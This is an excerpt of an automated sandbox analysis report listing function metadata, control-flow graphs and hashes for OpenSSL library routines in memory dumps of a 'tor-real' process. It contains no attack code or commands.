                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: memset$L_cleanseO_reallocO_secure_clear_freeR_put_errormemcpy
                                                                            • String ID: A$Z$a$d

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CRYPTO_realloc.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6C270562), ref: 6C29D50A
                                                                            • memset.MSVCRT ref: 6C29D53A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            Similarity
                                                                            • API ID: O_reallocmemset
                                                                            • String ID: m

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CRYPTO_secure_clear_free.LIBCRYPTO-1_1 ref: 6C1DC0D3
                                                                              • Part of subcall function 6C29F530: OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C29F551
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C1DC0EB
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C1DC10F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            Similarity
                                                                            • API ID: L_cleanseO_clear_freeO_freeO_secure_clear_free
                                                                            • String ID: 3$5

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: K

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A64D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Similarity
                                                                            • API ID: O_malloc
                                                                            • String ID: ?$A$E

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CRYPTO_free_ex_data.LIBCRYPTO-1_1 ref: 6C1B336B
                                                                            • CRYPTO_THREAD_lock_free.LIBCRYPTO-1_1 ref: 6C1B3376
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C1B338E
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            Similarity
                                                                            • API ID: D_lock_freeO_freeO_free_ex_data
                                                                            • String ID:

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A64D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            Similarity
                                                                            • API ID: O_malloc
                                                                            • String ID: ?

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            Similarity
                                                                            • API ID: mallocmemset
                                                                            • String ID:
                                                                            • API String ID: 2882185209-0
                                                                            • Opcode ID: 3a05bb34f1140a3d71389ed19725fab35512b7f3a21512134c705ef2e9f615ab
                                                                            • Instruction ID: d1ca814c3ef1f7bab5335f0a29ab4eb10f2704cb2a3a5a4bd6d1a29ad31a7d98
                                                                            • Opcode Fuzzy Hash: 3a05bb34f1140a3d71389ed19725fab35512b7f3a21512134c705ef2e9f615ab
                                                                            • Instruction Fuzzy Hash: AB01B175A0A3018FDB40DF69958074BBAE4BB44208F50452DFC8887700D370C8428B83

                                                                            Control-flow Graph

                                                                            control_flow_graph 419 6c09aa50-6c09aa62 420 6c09aaa1-6c09aab6 419->420 421 6c09aa64-6c09aa74 419->421 422 6c09aa78-6c09aa9f CRYPTO_free 421->422 422->420 422->422
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6C0B1647), ref: 6C09AA91
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: b4ae6d82587d3ce9b2b87a1a7ad50f1c8a4bde4b6966207afc57dc775bd4506a
                                                                            • Instruction ID: ec4eab1f5f375514258c066ca91372316a02e2b978a99940f4035e8f23bedad1
                                                                            • Opcode Fuzzy Hash: b4ae6d82587d3ce9b2b87a1a7ad50f1c8a4bde4b6966207afc57dc775bd4506a
                                                                            • Instruction Fuzzy Hash: D8F0BE716047069FEB10CF28E984B8BBBE0FF80348F50062CD8585B201C332F169CB91
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID:
                                                                            • API String ID: 2581946324-0
                                                                            • Opcode ID: 9bb851b2a5a7e6f23553cc6390e50597ead9852eeda5a4aa1822c500de86109f
                                                                            • Instruction ID: 1d2f6aee26c4a3d0205da40792e851c37e39fa2816899b3d83c8acc021b737d9
                                                                            • Opcode Fuzzy Hash: 9bb851b2a5a7e6f23553cc6390e50597ead9852eeda5a4aa1822c500de86109f
                                                                            • Instruction Fuzzy Hash: 59D05EB05043008BCB00AF54D9C574D7BE0BF95309F84486CEC885F353D33794948B52

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 6C2AC7D0: strlen.MSVCRT ref: 6C2AC7EF
                                                                              • Part of subcall function 6C2AC7D0: MultiByteToWideChar.KERNEL32 ref: 6C2AC824
                                                                              • Part of subcall function 6C2AC7D0: MultiByteToWideChar.KERNEL32 ref: 6C2AC86E
                                                                            • strchr.MSVCRT ref: 6C1BA1F8
                                                                            • BIO_new.LIBCRYPTO-1_1 ref: 6C1BA213
                                                                              • Part of subcall function 6C1B3130: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C1B3151
                                                                              • Part of subcall function 6C1B3130: CRYPTO_new_ex_data.LIBCRYPTO-1_1 ref: 6C1B3183
                                                                              • Part of subcall function 6C1B3130: CRYPTO_THREAD_lock_new.LIBCRYPTO-1_1 ref: 6C1B318C
                                                                            • BIO_clear_flags.LIBCRYPTO-1_1 ref: 6C1BA22D
                                                                            • BIO_ctrl.LIBCRYPTO-1_1 ref: 6C1BA245
                                                                            • GetLastError.KERNEL32 ref: 6C1BA258
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C1BA281
                                                                            • ERR_add_error_data.LIBCRYPTO-1_1 ref: 6C1BA2AD
                                                                            • _errno.MSVCRT ref: 6C1BA2B8
                                                                            • _errno.MSVCRT ref: 6C1BA2BF
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C1BA2EF
                                                                            • fclose.MSVCRT ref: 6C1BA303
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiR_put_errorWide_errno$D_lock_newErrorLastO_clear_flagsO_ctrlO_newO_new_ex_dataO_zallocR_add_error_datafclosestrchrstrlen
                                                                            • String ID: N$m
                                                                            • API String ID: 496359561-1202619803
                                                                            • Opcode ID: 00da3daad443020bd3e5953158e9f2842ba62017610531270f89efd18a816652
                                                                            • Instruction ID: cf0c2680487567334771b98c13a242e291cd8361977502d7d7fd044ce62b943f
                                                                            • Opcode Fuzzy Hash: 00da3daad443020bd3e5953158e9f2842ba62017610531270f89efd18a816652
                                                                            • Instruction Fuzzy Hash: FA3101B55087009FD300AF66C58571FBAE0BF85708F41882DE5D95BB51DBBA8498CF93

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$_errnofopenstrlen$_wfopen
                                                                            • String ID:
                                                                            • API String ID: 3461520518-0
                                                                            • Opcode ID: 837d79803dca49988825914ae9d9a590e6f953989ebfc3600273cbec3274fb24
                                                                            • Instruction ID: a27f68f1590a3cf12ff39267fca64161c0f135e91852a11b2b0167507c6dfc4a
                                                                            • Opcode Fuzzy Hash: 837d79803dca49988825914ae9d9a590e6f953989ebfc3600273cbec3274fb24
                                                                            • Instruction Fuzzy Hash: B74103B090830ADFDB04EFA9C58465EBBF4BF89748F01892EE89497640E7759845CF92

                                                                            Control-flow Graph

                                                                            control_flow_graph 95 6c3440b0-6c3440c3 96 6c3440c5-6c3440cc 95->96 97 6c3440d0-6c344119 call 6c344740 call 6c344950 95->97 97->96 102 6c34411b-6c344124 97->102 103 6c3441c0-6c3441c2 102->103 104 6c34412a 102->104 105 6c3442c0 103->105 106 6c3441c8-6c3441d5 103->106 107 6c34412f-6c344131 104->107 108 6c3442c5-6c3442cb 105->108 109 6c344308 106->109 110 6c3441db-6c3441e6 106->110 107->108 111 6c344137-6c34413c 107->111 108->96 112 6c3442d1 108->112 115 6c344312-6c34434f call 6c343ef0 EnterCriticalSection 109->115 110->107 111->108 113 6c344142-6c344148 111->113 114 6c3442d8-6c3442fd call 6c343f50 112->114 113->115 116 6c34414e-6c344157 113->116 130 6c3442ff 114->130 125 6c344385-6c34439c LeaveCriticalSection 115->125 126 6c344351-6c34435d 115->126 118 6c34417f-6c3441a0 116->118 119 6c344159 116->119 122 6c3441f0-6c344227 call 6c343f50 118->122 123 6c3441a2-6c3441a5 118->123 119->96 122->118 141 6c34422d 122->141 127 6c3441a7-6c3441aa 123->127 128 6c344160-6c34416e call 6c343f50 123->128 131 6c344360-6c344370 TlsGetValue GetLastError 126->131 132 6c344290-6c3442b1 call 6c343f50 127->132 133 6c3441b0-6c3441bb call 6c343ef0 127->133 147 6c344170-6c344179 128->147 135 6c344230-6c344237 130->135 137 6c344372-6c344374 131->137 138 6c34437e-6c344383 131->138 132->147 133->103 135->96 142 6c34423d-6c344249 135->142 137->138 144 6c344376-6c344379 137->144 138->125 138->131 141->135 146 6c344250-6c344260 142->146 144->138 148 6c344262-6c344279 VirtualProtect 146->148 149 6c34427c-6c344285 146->149 147->118 147->135 148->149 149->146 150 6c344287-6c34428e 149->150
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519950221.000000006C3E4000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519950221.000000006C475000.00000002.00000001.01000000.00000010.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c180000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 880799bda47228141357e0e919934f43ad448887272ada59ff8402abc4087351
                                                                            • Instruction ID: 6ba466386e7c2f72ea2f18ad0cd348ba7c6342fe0054f26a706058d7ddf6804c
                                                                            • Opcode Fuzzy Hash: 880799bda47228141357e0e919934f43ad448887272ada59ff8402abc4087351
                                                                            • Instruction Fuzzy Hash: 1571F376A012158FCB10DF69D48064AB7F5FF5A348F15CA26D994A7B05D331E805CF92

                                                                            Control-flow Graph

                                                                            control_flow_graph 311 6c0eb890-6c0eb8a3 312 6c0eb8a5-6c0eb8ac 311->312 313 6c0eb8b0-6c0eb8f9 call 6c0ebf20 call 6c0ec130 311->313 313->312 318 6c0eb8fb-6c0eb904 313->318 319 6c0eb90a 318->319 320 6c0eb9a0-6c0eb9a2 318->320 323 6c0eb90f-6c0eb911 319->323 321 6c0eb9a8-6c0eb9b5 320->321 322 6c0ebaa0 320->322 325 6c0eb9bb-6c0eb9c6 321->325 326 6c0ebae8-6c0ebaed 321->326 324 6c0ebaa5-6c0ebaab 322->324 323->324 327 6c0eb917-6c0eb91c 323->327 324->312 328 6c0ebab1 324->328 325->323 327->324 329 6c0eb922-6c0eb928 327->329 330 6c0ebab8-6c0ebadd call 6c0eb730 328->330 331 6c0eb92e-6c0eb937 329->331 332 6c0ebaf2-6c0ebb02 call 6c0eb6d0 329->332 344 6c0ebadf 330->344 335 6c0eb95f-6c0eb980 331->335 336 6c0eb939 331->336 338 6c0eb982-6c0eb985 335->338 339 6c0eb9d0-6c0eba07 call 6c0eb730 335->339 336->312 341 6c0eb987-6c0eb98a 338->341 342 6c0eb940-6c0eb94e call 6c0eb730 338->342 339->335 353 6c0eba0d 339->353 345 6c0eba70-6c0eba91 call 6c0eb730 341->345 346 6c0eb990-6c0eb99b call 6c0eb6d0 341->346 356 6c0eb950-6c0eb959 342->356 348 6c0eba10-6c0eba17 344->348 345->356 346->320 348->312 354 6c0eba1d-6c0eba29 348->354 353->348 355 6c0eba30-6c0eba40 354->355 358 6c0eba5c-6c0eba65 355->358 359 6c0eba42-6c0eba59 VirtualProtect 355->359 356->335 356->348 358->355 360 6c0eba67-6c0eba6e 358->360 359->358
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e70e79345b1e9df4a923e1dc36b06c1d053d2ca7cc688cbda22c3116a81289ec
                                                                            • Instruction ID: 16f2245fdcb10d5114c702caafbea502a835efbd0e554cf30eca3e034f9ba111
                                                                            • Opcode Fuzzy Hash: e70e79345b1e9df4a923e1dc36b06c1d053d2ca7cc688cbda22c3116a81289ec
                                                                            • Instruction Fuzzy Hash: DF519E72B4531ACFCB10DF28C48078ABBF1FB8E308F59856AD854ABB45D730A905DB95

                                                                            Control-flow Graph

                                                                            control_flow_graph 361 6c0eb9cb-6c0eb9cf 362 6c0eb9d0-6c0eba07 call 6c0eb730 361->362 365 6c0eb95f-6c0eb980 362->365 366 6c0eba0d 362->366 365->362 367 6c0eb982-6c0eb985 365->367 368 6c0eba10-6c0eba17 366->368 369 6c0eb987-6c0eb98a 367->369 370 6c0eb940-6c0eb94e call 6c0eb730 367->370 371 6c0eba1d-6c0eba29 368->371 372 6c0eb8a5-6c0eb8ac 368->372 374 6c0eba70-6c0eba91 call 6c0eb730 369->374 375 6c0eb990-6c0eb9a2 call 6c0eb6d0 369->375 382 6c0eb950-6c0eb959 370->382 373 6c0eba30-6c0eba40 371->373 378 6c0eba5c-6c0eba65 373->378 379 6c0eba42-6c0eba59 VirtualProtect 373->379 374->382 386 6c0eb9a8-6c0eb9b5 375->386 387 6c0ebaa0 375->387 378->373 383 6c0eba67-6c0eba6e 378->383 379->378 382->365 382->368 389 6c0eb9bb-6c0eb9c6 386->389 390 6c0ebae8-6c0ebaed 386->390 388 6c0ebaa5-6c0ebaab 387->388 388->372 391 6c0ebab1 388->391 389->388 394 6c0eb917-6c0eb91c 389->394 393 6c0ebab8-6c0ebadd call 6c0eb730 391->393 401 6c0ebadf 393->401 394->388 396 6c0eb922-6c0eb928 394->396 398 6c0eb92e-6c0eb937 396->398 399 6c0ebaf2-6c0ebb02 call 6c0eb6d0 396->399 398->365 402 6c0eb939 398->402 401->368 402->372
                                                                            APIs
                                                                              • Part of subcall function 6C0EB730: VirtualQuery.KERNEL32 ref: 6C0EB7BB
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0912A5), ref: 6C0EBA57
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$ProtectQuery
                                                                            • String ID:
                                                                            • API String ID: 1027372294-0
                                                                            • Opcode ID: 591c5431613e521c53a53f0f4c424a79b53d8f24450ebb15f1554815489c7022
                                                                            • Instruction ID: d0afed3f5811e5d890d16d6ffe32712c6c955c5f64011ece3997a6c9f8c31f5e
                                                                            • Opcode Fuzzy Hash: 591c5431613e521c53a53f0f4c424a79b53d8f24450ebb15f1554815489c7022
                                                                            • Instruction Fuzzy Hash: 75113676F1131A8FCF14CF28C88068AB7F1BF89304F16856AD95963745E730B9068B84

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 6C0EB730: VirtualQuery.KERNEL32 ref: 6C0EB7BB
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0912A5), ref: 6C0EBA57
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$ProtectQuery
                                                                            • String ID:
                                                                            • API String ID: 1027372294-0
                                                                            • Opcode ID: 971efbffe1cf8ef3f5ff5f18011108e24d2fdb9aafe77bc09dd25c086a5d7d18
                                                                            • Instruction ID: b9004d4c8e4218a10a7f451d016c27767a6c825101782745649ae4253fe5da3e
                                                                            • Opcode Fuzzy Hash: 971efbffe1cf8ef3f5ff5f18011108e24d2fdb9aafe77bc09dd25c086a5d7d18
                                                                            • Instruction Fuzzy Hash: CE110376A4571ACFCF20CF18C88478AB7F1FB89318F19885AC99967705D730BA468B81
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_error$O_free$Y_free$D_sizeL_sk_pushO_mallocO_zallocX509X509_freeX509_get0_pubkeyd2i_memcpy
                                                                            • String ID: A
                                                                            • API String ID: 557718904-3554254475
                                                                            • Opcode ID: 2e0d1062bbadc25eeb870577d1eb8db5bd1b9005d69767c530471ed4b7a98b17
                                                                            • Instruction ID: 7094fd57d695485323dedad5f98dfd76e673cdadc11f8ecc9cc3b30877c40327
                                                                            • Opcode Fuzzy Hash: 2e0d1062bbadc25eeb870577d1eb8db5bd1b9005d69767c530471ed4b7a98b17
                                                                            • Instruction Fuzzy Hash: 6E4223B12097429FD3009FA4C48475EBBF0BF89348F508E1DE4E89BB51D778E9468B86
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmp
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmp
